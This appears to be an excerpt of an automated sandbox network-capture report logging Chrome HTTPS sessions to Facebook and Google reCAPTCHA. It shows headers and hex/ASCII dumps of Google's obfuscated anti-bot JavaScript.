                                                                                                                                                                                                                                  2024-09-29 04:53:55 UTC1859INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27
                                                                                                                                                                                                                                  Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net '
                                                                                                                                                                                                                                  2024-09-29 04:53:55 UTC1785INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                  Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  147192.168.2.650066216.58.206.684431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:55 UTC1372OUTGET /recaptcha/api2/webworker.js?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY HTTP/1.1
                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                  sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                  sec-ch-ua-model: ""
                                                                                                                                                                                                                                  sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Dest: worker
                                                                                                                                                                                                                                  Referer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LcA2tEZAAAAAJj7FTYTF9cZ4NL3ShgBCBfkWov0&co=aHR0cHM6Ly9wbGF5Lmdvb2dsZS5jb206NDQz&hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&size=invisible&cb=9vfd1mtb6k9g
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: NID=518=c0YpqPa6hP2dEuhts22V1K_9pm902kP5V6GIkxAZ1Ba2Gldfrqz9qY6POhM7ZqqmSn2wlud9uWufI-xMJmkbTZtLym1LJj_PVkOjmYX5QDA9V_xhj2gTjZx4AvGPpR5dOg4li48rH0Zbgpv3Wqy6mgCu_DqVvnxQMF1y3xnddiEnCnXICg
                                                                                                                                                                                                                                  2024-09-29 04:53:55 UTC917INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                  Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                  Expires: Sun, 29 Sep 2024 04:53:55 GMT
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:55 GMT
                                                                                                                                                                                                                                  Cache-Control: private, max-age=300
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  2024-09-29 04:53:55 UTC108INData Raw: 36 36 0d 0a 69 6d 70 6f 72 74 53 63 72 69 70 74 73 28 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 78 64 73 30 72 7a 47 72 6b 74 52 38 38 75 45 5a 32 4a 55 76 64 67 4f 59 2f 72 65 63 61 70 74 63 68 61 5f 5f 65 6e 2e 6a 73 27 29 3b 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 66importScripts('https://www.gstatic.com/recaptcha/releases/xds0rzGrktR88uEZ2JUvdgOY/recaptcha__en.js');
                                                                                                                                                                                                                                  2024-09-29 04:53:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  148192.168.2.650073216.58.206.684431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:55 UTC1360OUTGET /js/bg/dubcxWuhhbqw8uaLSFFGvELnk5WmffD3wjoYeQZ33gk.js HTTP/1.1
                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                  sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                  sec-ch-ua-model: ""
                                                                                                                                                                                                                                  sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LcA2tEZAAAAAJj7FTYTF9cZ4NL3ShgBCBfkWov0&co=aHR0cHM6Ly9wbGF5Lmdvb2dsZS5jb206NDQz&hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&size=invisible&cb=9vfd1mtb6k9g
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: NID=518=c0YpqPa6hP2dEuhts22V1K_9pm902kP5V6GIkxAZ1Ba2Gldfrqz9qY6POhM7ZqqmSn2wlud9uWufI-xMJmkbTZtLym1LJj_PVkOjmYX5QDA9V_xhj2gTjZx4AvGPpR5dOg4li48rH0Zbgpv3Wqy6mgCu_DqVvnxQMF1y3xnddiEnCnXICg
                                                                                                                                                                                                                                  2024-09-29 04:53:56 UTC812INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/botguard-scs
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin; report-to="botguard-scs"
                                                                                                                                                                                                                                  Report-To: {"group":"botguard-scs","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/botguard-scs"}]}
                                                                                                                                                                                                                                  Content-Length: 18618
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: sffe
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Thu, 26 Sep 2024 04:57:25 GMT
                                                                                                                                                                                                                                  Expires: Fri, 26 Sep 2025 04:57:25 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                  Last-Modified: Tue, 17 Sep 2024 15:00:00 GMT
                                                                                                                                                                                                                                  Content-Type: text/javascript
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Age: 258991
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-09-29 04:53:56 UTC578INData Raw: 2f 2a 20 41 6e 74 69 2d 73 70 61 6d 2e 20 57 61 6e 74 20 74 6f 20 73 61 79 20 68 65 6c 6c 6f 3f 20 43 6f 6e 74 61 63 74 20 28 62 61 73 65 36 34 29 20 59 6d 39 30 5a 33 56 68 63 6d 51 74 59 32 39 75 64 47 46 6a 64 45 42 6e 62 32 39 6e 62 47 55 75 59 32 39 74 20 2a 2f 20 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 63 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 43 3d 66 75 6e 63 74 69 6f 6e 28 64 29 7b 72 65 74 75 72 6e 20 64 7d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 61 29 7b 69 66 28 21 28 61 3d 28 64 3d 6e 75 6c 6c 2c 63 29 2e 74 72 75 73 74 65 64 54 79 70 65 73 2c 61 29 7c 7c 21 61 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 29 72 65 74 75 72 6e 20 64 3b 74 72 79 7b 64 3d 61 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 22 62 67 22 2c 7b 63 72 65 61 74 65 48 54 4d
                                                                                                                                                                                                                                  Data Ascii: /* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ (function(){var c=this||self,C=function(d){return d},m=function(d,a){if(!(a=(d=null,c).trustedTypes,a)||!a.createPolicy)return d;try{d=a.createPolicy("bg",{createHTM
                                                                                                                                                                                                                                  2024-09-29 04:53:56 UTC1390INData Raw: 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 27 2c 0a 27 2a 2f 27 2c 0a 27 76 61 72 20 64 42 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 61 2c 43 29 7b 69 66 28 64 2e 6c 65 6e 67 74 68 3d 3d 33 29 7b 66 6f 72 28 43 3d 30 3b 43 3c 33 3b 43 2b 2b 29 61 5b 43 5d 2b 3d 64 5b 43 5d 3b 66 6f 72 28 43 3d 28 64 3d 5b 31 33 2c 38 2c 31 33 2c 31 32 2c 31 36 2c 35 2c 33 2c 31 30 2c 31 35 5d 2c 30 29 3b 43 3c 39 3b 43 2b 2b 29 61 5b 33 5d 28 61 2c 43 25 33 2c 64 5b 43 5d 29 7d 7d 2c 61 32 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 61 2c 43 29 7b 72 65 74 75 72 6e 20 64 2e 50 45 28 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 43 3d 6d 7d 2c 66 61 6c 73 65 2c 61 29 2c 43 7d 2c 63 62 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 61 2c 43 2c 6d 2c 63
                                                                                                                                                                                                                                  Data Ascii: DX-License-Identifier: Apache-2.0','*/','var dB=function(d,a,C){if(d.length==3){for(C=0;C<3;C++)a[C]+=d[C];for(C=(d=[13,8,13,12,16,5,3,10,15],0);C<9;C++)a[3](a,C%3,d[C])}},a2=function(d,a,C){return d.PE(function(m){C=m},false,a),C},cb=function(d,a,C,m,c
                                                                                                                                                                                                                                  2024-09-29 04:53:56 UTC1390INData Raw: 6e 20 64 2e 59 3f 5a 74 28 64 2e 44 2c 64 29 3a 4a 28 38 2c 74 72 75 65 2c 64 29 7d 2c 58 74 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 61 2c 43 2c 6d 2c 63 29 7b 66 6f 72 28 63 3d 28 64 3d 64 2e 72 65 70 6c 61 63 65 28 2f 5c 5c 72 5c 5c 6e 2f 67 2c 22 5c 5c 6e 22 29 2c 61 3d 30 2c 5b 5d 29 2c 43 3d 30 3b 61 3c 64 2e 6c 65 6e 67 74 68 3b 61 2b 2b 29 6d 3d 64 2e 63 68 61 72 43 6f 64 65 41 74 28 61 29 2c 6d 3c 31 32 38 3f 63 5b 43 2b 2b 5d 3d 6d 3a 28 6d 3c 32 30 34 38 3f 63 5b 43 2b 2b 5d 3d 6d 3e 3e 36 7c 31 39 32 3a 28 28 6d 26 36 34 35 31 32 29 3d 3d 35 35 32 39 36 26 26 61 2b 31 3c 64 2e 6c 65 6e 67 74 68 26 26 28 64 2e 63 68 61 72 43 6f 64 65 41 74 28 61 2b 31 29 26 36 34 35 31 32 29 3d 3d 35 36 33 32 30 3f 28 6d 3d 36 35 35 33 36 2b 28 28 6d 26 31 30 32 33
                                                                                                                                                                                                                                  Data Ascii: n d.Y?Zt(d.D,d):J(8,true,d)},Xt=function(d,a,C,m,c){for(c=(d=d.replace(/\\r\\n/g,"\\n"),a=0,[]),C=0;a<d.length;a++)m=d.charCodeAt(a),m<128?c[C++]=m:(m<2048?c[C++]=m>>6|192:((m&64512)==55296&&a+1<d.length&&(d.charCodeAt(a+1)&64512)==56320?(m=65536+((m&1023
                                                                                                                                                                                                                                  2024-09-29 04:53:56 UTC1390INData Raw: 75 6e 63 74 69 6f 6e 28 64 2c 61 2c 43 2c 6d 29 7b 66 6f 72 28 3b 61 2e 47 2e 6c 65 6e 67 74 68 3b 29 7b 43 3d 28 61 2e 53 3d 6e 75 6c 6c 2c 61 2e 47 29 2e 70 6f 70 28 29 3b 74 72 79 7b 6d 3d 74 75 28 61 2c 43 29 7d 63 61 74 63 68 28 63 29 7b 4e 28 63 2c 61 29 7d 69 66 28 64 26 26 61 2e 53 29 7b 64 3d 61 2e 53 2c 64 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 28 61 2c 74 72 75 65 2c 74 72 75 65 29 7d 29 3b 62 72 65 61 6b 7d 7d 72 65 74 75 72 6e 20 6d 7d 2c 6c 6c 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 61 2c 43 29 7b 69 66 28 28 43 3d 74 79 70 65 6f 66 20 64 2c 43 29 3d 3d 22 6f 62 6a 65 63 74 22 29 69 66 28 64 29 7b 69 66 28 64 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 29 72 65 74 75 72 6e 22 61 72 72 61 79 22 3b 69 66 28 64 20 69 6e 73 74 61 6e 63 65 6f
                                                                                                                                                                                                                                  Data Ascii: unction(d,a,C,m){for(;a.G.length;){C=(a.S=null,a.G).pop();try{m=tu(a,C)}catch(c){N(c,a)}if(d&&a.S){d=a.S,d(function(){g(a,true,true)});break}}return m},ll=function(d,a,C){if((C=typeof d,C)=="object")if(d){if(d instanceof Array)return"array";if(d instanceo
                                                                                                                                                                                                                                  2024-09-29 04:53:56 UTC1390INData Raw: 61 3d 6d 7d 2c 43 7d 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 61 2c 43 2c 6d 2c 63 2c 5a 2c 65 2c 46 29 7b 69 66 28 21 64 2e 6a 69 26 26 28 46 3d 76 6f 69 64 20 30 2c 43 26 26 43 5b 30 5d 3d 3d 3d 47 26 26 28 46 3d 43 5b 32 5d 2c 61 3d 43 5b 31 5d 2c 43 3d 76 6f 69 64 20 30 29 2c 63 3d 77 28 64 2c 33 39 37 29 2c 63 2e 6c 65 6e 67 74 68 3d 3d 30 26 26 28 65 3d 77 28 64 2c 39 30 29 3e 3e 33 2c 63 2e 70 75 73 68 28 61 2c 65 3e 3e 38 26 32 35 35 2c 65 26 32 35 35 29 2c 46 21 3d 76 6f 69 64 20 30 26 26 63 2e 70 75 73 68 28 46 26 32 35 35 29 29 2c 61 3d 22 22 2c 43 26 26 28 43 2e 6d 65 73 73 61 67 65 26 26 28 61 2b 3d 43 2e 6d 65 73 73 61 67 65 29 2c 43 2e 73 74 61 63 6b 26 26 28 61 2b 3d 22 3a 22 2b 43 2e 73 74 61 63 6b 29 29 2c 43 3d 77 28 64 2c 35 30 32 29
                                                                                                                                                                                                                                  Data Ascii: a=m},C},u=function(d,a,C,m,c,Z,e,F){if(!d.ji&&(F=void 0,C&&C[0]===G&&(F=C[2],a=C[1],C=void 0),c=w(d,397),c.length==0&&(e=w(d,90)>>3,c.push(a,e>>8&255,e&255),F!=void 0&&c.push(F&255)),a="",C&&(C.message&&(a+=C.message),C.stack&&(a+=":"+C.stack)),C=w(d,502)
                                                                                                                                                                                                                                  2024-09-29 04:53:56 UTC1390INData Raw: 35 28 29 29 2c 6e 65 77 20 43 29 2c 6d 7d 5d 7d 2c 46 74 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 61 29 7b 72 65 74 75 72 6e 20 64 28 66 75 6e 63 74 69 6f 6e 28 43 29 7b 43 28 61 29 7d 29 2c 5b 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 5d 7d 2c 69 6c 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 61 29 7b 72 65 74 75 72 6e 20 61 3d 30 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 3c 64 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 66 61 6c 73 65 2c 76 61 6c 75 65 3a 64 5b 61 2b 2b 5d 7d 3a 7b 64 6f 6e 65 3a 74 72 75 65 7d 7d 7d 2c 43 24 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 61 2c 43 2c 6d 2c 63 2c 5a 2c 65 2c 46 29 7b 66 6f 72 28 28 63 2e 75 5a 3d 57 62 28 63 2e 56 2c 28 63 2e 72 61 3d 63 5b 6b 5d 2c 63 2e
                                                                                                                                                                                                                                  Data Ascii: 5()),new C),m}]},Ft=function(d,a){return d(function(C){C(a)}),[function(){return a},function(){}]},il=function(d,a){return a=0,function(){return a<d.length?{done:false,value:d[a++]}:{done:true}}},C$=function(d,a,C,m,c,Z,e,F){for((c.uZ=Wb(c.V,(c.ra=c[k],c.
                                                                                                                                                                                                                                  2024-09-29 04:53:56 UTC1390INData Raw: 28 66 2c 51 2c 4f 2c 57 2c 70 2c 71 2c 4c 29 7b 66 6f 72 28 51 3d 77 28 66 2c 28 57 3d 28 70 3d 28 4c 3d 42 28 66 29 2c 65 31 28 66 29 29 2c 22 22 29 2c 32 37 33 29 29 2c 71 3d 51 2e 6c 65 6e 67 74 68 2c 4f 3d 30 3b 70 2d 2d 3b 29 4f 3d 28 28 4f 7c 30 29 2b 28 65 31 28 66 29 7c 30 29 29 25 71 2c 57 2b 3d 65 5b 51 5b 4f 5d 5d 3b 52 28 4c 2c 66 2c 57 29 7d 2c 28 52 28 28 28 63 2e 4b 79 3d 28 52 28 34 33 38 2c 28 63 2e 48 45 3d 28 41 28 63 2c 66 75 6e 63 74 69 6f 6e 28 66 2c 51 2c 4f 2c 57 29 7b 4f 3d 42 28 28 57 3d 28 51 3d 42 28 66 29 2c 42 29 28 66 29 2c 66 29 29 2c 52 28 4f 2c 66 2c 77 28 66 2c 51 29 7c 7c 77 28 66 2c 57 29 29 7d 2c 28 41 28 63 2c 28 52 28 34 36 31 2c 63 2c 28 41 28 63 2c 28 41 28 63 2c 66 75 6e 63 74 69 6f 6e 28 66 2c 51 2c 4f 29 7b 52
                                                                                                                                                                                                                                  Data Ascii: (f,Q,O,W,p,q,L){for(Q=w(f,(W=(p=(L=B(f),e1(f)),""),273)),q=Q.length,O=0;p--;)O=((O|0)+(e1(f)|0))%q,W+=e[Q[O]];R(L,f,W)},(R(((c.Ky=(R(438,(c.HE=(A(c,function(f,Q,O,W){O=B((W=(Q=B(f),B)(f),f)),R(O,f,w(f,Q)||w(f,W))},(A(c,(R(461,c,(A(c,(A(c,function(f,Q,O){R
                                                                                                                                                                                                                                  2024-09-29 04:53:56 UTC1390INData Raw: 2e 4e 73 3d 21 28 63 2e 42 45 3d 5b 5d 2c 31 29 2c 63 29 2e 58 3d 76 6f 69 64 20 30 2c 5b 5d 29 2c 46 29 2e 74 69 6d 65 4f 72 69 67 69 6e 7c 7c 28 46 2e 74 69 6d 69 6e 67 7c 7c 7b 7d 29 2e 6e 61 76 69 67 61 74 69 6f 6e 53 74 61 72 74 7c 7c 30 2c 63 29 2e 43 3d 5b 5d 2c 6d 26 26 6d 2e 6c 65 6e 67 74 68 3d 3d 32 26 26 28 63 2e 42 45 3d 6d 5b 31 5d 2c 63 2e 44 78 3d 6d 5b 30 5d 29 2c 63 29 2c 30 29 2c 39 30 29 2c 63 2c 30 29 2c 31 35 38 29 29 2c 33 32 35 29 29 2c 33 32 29 29 2c 63 29 2c 63 29 2c 33 32 34 29 29 2c 52 29 28 33 32 31 2c 63 2c 37 39 33 29 2c 34 36 35 29 29 2c 31 34 29 29 2c 66 75 6e 63 74 69 6f 6e 28 66 2c 51 29 7b 28 66 3d 28 51 3d 42 28 66 29 2c 77 28 66 2e 49 2c 51 29 29 2c 66 29 5b 30 5d 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e
                                                                                                                                                                                                                                  Data Ascii: .Ns=!(c.BE=[],1),c).X=void 0,[]),F).timeOrigin||(F.timing||{}).navigationStart||0,c).C=[],m&&m.length==2&&(c.BE=m[1],c.Dx=m[0]),c),0),90),c,0),158)),325)),32)),c),c),324)),R)(321,c,793),465)),14)),function(f,Q){(f=(Q=B(f),w(f.I,Q)),f)[0].removeEventListen
                                                                                                                                                                                                                                  2024-09-29 04:53:56 UTC1390INData Raw: 74 68 2c 51 3d 4f 2e 58 75 2c 4f 3d 4f 2e 65 69 2c 71 3d 70 3d 3d 30 3f 6e 65 77 20 4f 5b 57 5d 3a 70 3d 3d 31 3f 6e 65 77 20 4f 5b 57 5d 28 71 5b 30 5d 29 3a 70 3d 3d 32 3f 6e 65 77 20 4f 5b 57 5d 28 71 5b 30 5d 2c 71 5b 31 5d 29 3a 70 3d 3d 33 3f 6e 65 77 20 4f 5b 57 5d 28 71 5b 30 5d 2c 71 5b 31 5d 2c 71 5b 32 5d 29 3a 70 3d 3d 34 3f 6e 65 77 20 4f 5b 57 5d 28 71 5b 30 5d 2c 71 5b 31 5d 2c 71 5b 32 5d 2c 71 5b 33 5d 29 3a 32 28 29 2c 52 28 51 2c 66 2c 71 29 29 7d 2c 31 36 29 2c 49 29 28 5b 4c 24 5d 2c 63 29 2c 4d 39 29 2c 5a 5d 2c 63 29 2c 5b 7a 62 2c 61 5d 29 2c 63 29 2c 63 29 2c 74 72 75 65 2c 74 72 75 65 29 7d 2c 5a 74 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 61 29 7b 72 65 74 75 72 6e 28 64 3d 64 2e 63 72 65 61 74 65 28 29 2e 73 68 69 66 74 28 29 2c 61
                                                                                                                                                                                                                                  Data Ascii: th,Q=O.Xu,O=O.ei,q=p==0?new O[W]:p==1?new O[W](q[0]):p==2?new O[W](q[0],q[1]):p==3?new O[W](q[0],q[1],q[2]):p==4?new O[W](q[0],q[1],q[2],q[3]):2(),R(Q,f,q))},16),I)([L$],c),M9),Z],c),[zb,a]),c),c),true,true)},Zt=function(d,a){return(d=d.create().shift(),a
                                                                                                                                                                                                                                  2024-09-29 04:53:56 UTC1390INData Raw: 28 61 29 3b 65 6c 73 65 20 69 66 28 63 3d 3d 7a 62 29 7b 74 72 79 7b 66 6f 72 28 6d 3d 30 3b 6d 3c 64 2e 43 2e 6c 65 6e 67 74 68 3b 6d 2b 2b 29 74 72 79 7b 43 3d 64 2e 43 5b 6d 5d 2c 43 5b 30 5d 5b 43 5b 31 5d 5d 28 43 5b 32 5d 29 7d 63 61 74 63 68 28 5a 29 7b 7d 7d 63 61 74 63 68 28 5a 29 7b 7d 28 30 2c 61 5b 31 5d 29 28 66 75 6e 63 74 69 6f 6e 28 5a 2c 65 29 7b 64 2e 50 45 28 5a 2c 74 72 75 65 2c 65 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 5a 29 7b 28 49 28 5b 79 37 5d 2c 28 5a 3d 21 64 2e 47 2e 6c 65 6e 67 74 68 2c 64 29 29 2c 5a 29 26 26 67 28 64 2c 74 72 75 65 2c 66 61 6c 73 65 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 5a 29 7b 72 65 74 75 72 6e 20 64 2e 7a 6f 28 5a 29 7d 2c 28 6d 3d 28 64 2e 43 3d 5b 5d 2c 64 29 2e 67 28 29 2c 66 75 6e 63 74 69 6f 6e 28 5a 29
                                                                                                                                                                                                                                  Data Ascii: (a);else if(c==zb){try{for(m=0;m<d.C.length;m++)try{C=d.C[m],C[0][C[1]](C[2])}catch(Z){}}catch(Z){}(0,a[1])(function(Z,e){d.PE(Z,true,e)},function(Z){(I([y7],(Z=!d.G.length,d)),Z)&&g(d,true,false)},function(Z){return d.zo(Z)},(m=(d.C=[],d).g(),function(Z)


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
